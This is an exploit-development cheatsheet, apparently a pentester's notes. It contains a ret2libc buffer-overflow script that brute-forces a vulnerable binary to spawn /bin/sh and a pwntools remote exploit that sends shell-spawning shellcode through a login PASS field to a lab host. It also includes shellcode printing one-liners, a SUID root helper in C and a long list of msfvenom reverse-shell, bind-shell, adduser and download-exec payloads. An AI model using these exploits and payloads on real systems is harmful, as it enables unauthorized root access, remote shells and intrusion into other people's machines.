Cheatsheet

Exploit Development

Hexdump (python format)

hexdump -v -e '"\\""x" 1/1 "%02x" ""' example.exe
printf $(cat file.txt | tr -d '\n')

Cross compile with - mingw32

i586-mingw32msvc-gcc a.c
wine a.exe

Passing binary data as arguments

command $(python -c 'print ...')

Passing binary data as standard input

python -c 'print ...' | command

Use file as input and then read from standard input

cat file - | command
python -c 'print ...' | cat file - | command    

Printing shell code

(Bash) echo -e '\x31\xc0\x50\x68\x2f...'
(Python) python -c 'print "\x31\xc0\x50\x68\x2f..."'
(Perl) perl -e 'print "\x31\xc0\x50\x68\x2f..."'

ret2libc

  • Find libc address: ​ldd /usr/local/bin/backup
  • Find libc system function: ​readelf -s /lib32/libc.so.6 | grep system
  • Find libc exit function: ​readelf -s /lib32/libc.so.6 | grep exit
  • Find libc /bin/sh reference: ​strings -a -t x /lib32/libc.so.6 | grep /bin/sh
import struct, subprocess

libc = 0xf75e2000
sysOffset = 0x0003a940
sysAddress = libc + sysOffset
exitOffset = 0x0002e7b0
exitAddress = libc + exitOffset
binsh = libc + 0x0015900b

payload = "A" * 512
payload += struct.pack("<I", sysAddress)
payload += struct.pack("<I", exitAddress)
payload += struct.pack("<I", binsh)

attempts = 0

while True:
  attempts += 1
  print "Attempts: " + attempts
  subprocess.call(["/usr/local/bin/vulnerable-binary", "arg1", "arg2", payload])

Network attack

from pwn import *

shellcode =
"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xc
d\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x7
3\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"

payload = "A"*28 + p32(0xffffd630) + shellcode
r = remote('10.10.10.34', 7411)
print r.recv(1024)

r.sendline('USER admin')
print r.recv(1024)

r.sendline('PASS ' + payload)
r.interactive()

Simple SUID Binary

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
  setuid(0);
  system("id");
  return 0;
}

Msfvenum

Payloads

cmd/unix/bind_awk
cmd/unix/bind_busybox_telnetd
cmd/unix/bind_inetd
cmd/unix/bind_lua
cmd/unix/bind_netcat
cmd/unix/bind_netcat_gaping
cmd/unix/bind_netcat_gaping_ipv6
cmd/unix/bind_nodejs
cmd/unix/bind_perl
cmd/unix/bind_perl_ipv6
cmd/unix/bind_r
cmd/unix/bind_ruby
cmd/unix/bind_ruby_ipv6
cmd/unix/bind_socat_udp
cmd/unix/bind_stub
cmd/unix/bind_zsh
cmd/unix/generic
cmd/unix/reverse
cmd/unix/reverse_awk
cmd/unix/reverse_bash
cmd/unix/reverse_bash_telnet_ssl
cmd/unix/reverse_ksh
cmd/unix/reverse_lua
cmd/unix/reverse_ncat_ssl
cmd/unix/reverse_netcat
cmd/unix/reverse_netcat_gaping
cmd/unix/reverse_nodejs
cmd/unix/reverse_openssl
cmd/unix/reverse_perl
cmd/unix/reverse_perl_ssl
cmd/unix/reverse_php_ssl
cmd/unix/reverse_python
cmd/unix/reverse_python_ssl
cmd/unix/reverse_r
cmd/unix/reverse_ruby
cmd/unix/reverse_ruby_ssl
cmd/unix/reverse_socat_udp
cmd/unix/reverse_ssl_double_telnet
cmd/unix/reverse_stub
cmd/unix/reverse_zsh
cmd/windows/adduser
cmd/windows/generic
cmd/windows/powershell_bind_tcp
cmd/windows/powershell_reverse_tcp
cmd/windows/reverse_powershell
firefox/exec
firefox/shell_bind_tcp
firefox/shell_reverse_tcp
generic/shell_bind_tcp
generic/shell_reverse_tcp
java/shell/bind_tcp
java/shell/reverse_tcp
java/shell_reverse_tcp
linux/x64/exec
linux/x64/shell/bind_tcp
linux/x64/shell/reverse_tcp
linux/x64/shell_bind_tcp
linux/x64/shell_reverse_tcp
linux/x86/adduser
linux/x86/chmod
linux/x86/exec
linux/x86/shell/bind_tcp
linux/x86/shell/reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
multi/meterpreter/reverse_http
multi/meterpreter/reverse_https
nodejs/shell_bind_tcp
nodejs/shell_reverse_tcp
osx/armle/shell/bind_tcp
osx/armle/shell/reverse_tcp
osx/armle/shell_bind_tcp
osx/armle/shell_reverse_tcp
osx/ppc/shell/bind_tcp
osx/ppc/shell/reverse_tcp
osx/ppc/shell_bind_tcp
osx/ppc/shell_reverse_tcp
osx/x64/exec
osx/x64/shell_bind_tcp
osx/x64/shell_reverse_tcp
osx/x86/exec
osx/x86/shell_bind_tcp
osx/x86/shell_reverse_tcp
php/bind_php
php/download_exec
php/exec
php/reverse_perl
php/reverse_php
php/shell_findsock
python/shell_bind_tcp
python/shell_reverse_tcp
r/shell_bind_tcp
r/shell_reverse_tcp
ruby/shell_bind_tcp
ruby/shell_reverse_tcp
windows/adduser
windows/dllinject/bind_tcp
windows/dllinject/reverse_tcp
windows/download_exec
windows/exec
windows/powershell_bind_tcp
windows/powershell_reverse_tcp
windows/shell/bind_tcp
windows/shell/reverse_tcp
windows/shell_bind_tcp
windows/shell_reverse_tcp
windows/upexec/bind_tcp
windows/upexec/reverse_tcp
windows/x64/exec
windows/x64/powershell_bind_tcp
windows/x64/powershell_reverse_tcp
windows/x64/shell/bind_tcp
windows/x64/shell/reverse_tcp
windows/x64/shell_bind_tcp
windows/x64/shell_reverse_tcp